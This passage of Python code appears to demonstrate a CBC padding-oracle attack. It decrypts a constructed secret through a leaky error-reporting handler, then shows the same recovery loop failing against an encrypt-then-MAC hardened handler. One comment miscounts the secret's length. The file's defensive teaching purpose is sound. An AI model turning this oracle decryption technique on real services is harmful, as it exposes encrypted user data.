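    return _xor(bytes(intermediate), prev_block)

def demo() -> tuple:
    enc_key = bytes(range(1, 17))                   # constructed key, IV and secret
    mac_key = b"constructed-mac-key-for-the-demo"
    iv = bytes(range(100, 116))
    secret = b"constructed sample secret"           # 24 bytes -> two CBC blocks
    ct = cbc_encrypt(enc_key, iv, pkcs7_pad(secret))
    blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    leaked = pkcs7_unpad(b"".join(
        recover_block(lambda q: leaky_handler(enc_key, q), blocks[i - 1], blocks[i])
        for i in range(1, len(blocks))))
    tag = hmac.new(mac_key, iv + ct, hashlib.sha256).digest()
    try:  # only the genuine tag is available to replay, and no modified body matches it
        recover_block(lambda q: hardened_handler(enc_key, mac_key, q + tag),
                      blocks[0], blocks[1])
        closed = False
    except RuntimeError:
        closed = True
    return leaked, hardened_handler(enc_key, mac_key, iv + ct + tag) == 200, closed
```

demo() returns the plaintext the leaky handler gives up, whether the hardened handler still accepts the genuine token, and whether the same recovery loop fails against it.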